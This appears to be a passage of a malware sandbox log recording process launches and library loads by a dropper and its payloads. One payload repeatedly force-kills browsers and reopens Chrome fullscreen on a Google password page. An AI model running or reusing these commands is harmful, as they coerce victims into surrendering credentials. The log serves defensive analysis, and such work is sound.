Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wsock32.dll Jump to behavior
